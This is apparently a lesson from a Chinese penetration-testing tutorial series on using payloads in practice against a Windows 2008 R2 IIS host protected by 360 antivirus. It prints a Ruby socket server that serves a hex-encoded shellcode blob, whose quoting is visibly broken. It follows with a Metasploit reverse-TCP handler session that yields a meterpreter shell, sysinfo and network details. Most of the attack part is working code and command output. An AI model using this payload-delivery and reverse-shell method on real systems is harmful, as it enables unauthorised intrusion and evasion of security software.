目标机安装:360卫士+360杀毒

  2. 驱动器 C 中的卷没有标签。
  3. 卷的序列号是 C6F89BAB
  5. C:\ 的目录
  6. 2017/12/13 03:28 <DIR> inetpub
  7. 2009/07/14 11:20 <DIR> PerfLogs
  8. 2017/12/13 03:28 <DIR> Program Files
  9. 2019/01/23 14:09 <DIR> Program Files (x86)
  10. 2019/01/23 14:15 <DIR> Users
  11. 2017/12/13 03:25 <DIR> Windows
  12. 0 个文件 0 字节
  13. 6 个目录 21,387,132,928 可用字节

第九十二课:实战中的Payload应用 - 图2

配置payload:

  1. root@John:/var/www/html# cat ./Micropoor_rev.rb
  3. require 'socket'
  4. if ARGV.empty?
  5.   puts "Usage:"
  6.   puts "Micropoor.rb port"
  7.   exit
  8. end 
  10. PORT = ARGV.first.to_i 
  12. def handle_connection(client)
  13.   puts "Payload is on‐line \#{client}" 
  14. 8315827482df8ffffffe2f4ce2efc281e4575f732663e9daffdeba6642e4e1e8be532a552
  15. 2ef49ef6e532a5122ef4bebee5b640782c32fd27e588379e5a1eb0ec8199b6f3af728def6
  16. c5b1a60272e8465ff997c705a37cd3ecb388f2a6d7dc36bdfb9f732edff44eeadb9bfb7a6
  17. 0baba6ac69a7b92e678865ed99be33b69c9aa65270b6b952f784ef7bf4c6fb2e4e0c42ec7  
  19. 85ef7df87c36ee37cd3eece1b66a382696aff5f8ae733c374f028df8a5cd86278db7f7f17 
  20. c208f34331152e4be8c110cfeb19e8bf732272985674bf176dec67ecceee430127bda7dcc 
  21. ee98795f33623e98a7245dbbbb973e76a2da9ff0cdb3334504c5b8f63266268d5484399c3  
  22. 299aaa6e4ece7a7622b4e05a39c79bfcda637452ce546377aefbe8d5447b628d299aa8467 
  23. 6ad3e7733e33450ce5300e73dce6699acc4622b7a60bc6a7527782d78eeccceeadf174de7 
  24. 637450ce0883e58623e94a62440b68864a604b1526c74ca660199a62e7dd76cef89a6aeec 
  25. e09f32767fccaff5f17ec02e4e05af17e15361838019a6247abebba132fd27e430077aefa
  26. 5846754f84d30bfb79311783a0f321b5794affae09f32267fccaff5d3f76827c5c7c1a289  
  27. 08e731268d54d8d7ba5399aa85116350cbcd998084ef6ef1def42efa3a9b19f808d53e15ccb7e47e35c2d3dd9a1178b9f7")
  29.   client.close
  30. end 
  32. socket = TCPServer.new('0.0.0.0', PORT)
  33. puts "Listening on \#{PORT}. " 
  35. while client = socket.accept
  36.   Thread.new { handle_connection(client)}
  37. end 
  39. root@John:/var/www/html# ruby ./Micropoor_rev.rb 8080
  41. Listening on 8080.

第九十二课:实战中的Payload应用 - 图5

配置msf:

第九十二课:实战中的Payload应用 - 图7

  1. msf exploit(multi/handler) > exploit 
  3. [*] Started reverse TCP handler on 192.168.1.4:53
  4. [*] Sending stage (206403 bytes) to 192.168.1.2
  5. at 20190123 01:29:00 0500
  8. Server username: IIS APPPOOL\DefaultAppPool
  9. meterpreter > sysinfo
  10. Computer : WIN5BMI9HGC42S
  11. OS : Windows 2008 R2 (Build 7600).
  12. Architecture : x64
  13. System Language : zh_CN
  14. Domain : WORKGROUP
  15. Logged On Users : 1
  16. Meterpreter : x64/windows
  17. meterpreter > ipconfig 
  19. Interface 1
  20. ============ 
  21. Name : Software Loopback Interface 1
  22. Hardware MAC : 00:00:00:00:00:00
  23. MTU : 4294967295
  24. IPv4 Address : 127.0.0.1
  25. IPv4 Netmask : 255.0.0.0
  26. IPv6 Address : ::1
  27. IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff 
  29. Interface 11
  30. ============ 
  31. Name : Intel(R) PRO/1000 MT Network Connection
  32. Hardware MAC : 00:0c:29:bc:0d:5c
  33. MTU : 1500
  34. IPv4 Address : 192.168.1.2
  35. IPv4 Netmask : 255.255.255.0
  36. IPv6 Address : fe80::5582:70c8:a5a8:8223

靶机:

第九十二课:实战中的Payload应用 - 图10

Micropoor_shellcode for payload backdoor

https://micropoor.blogspot.com/2019/01/micropoorshellcode-for-payload-backdoor.html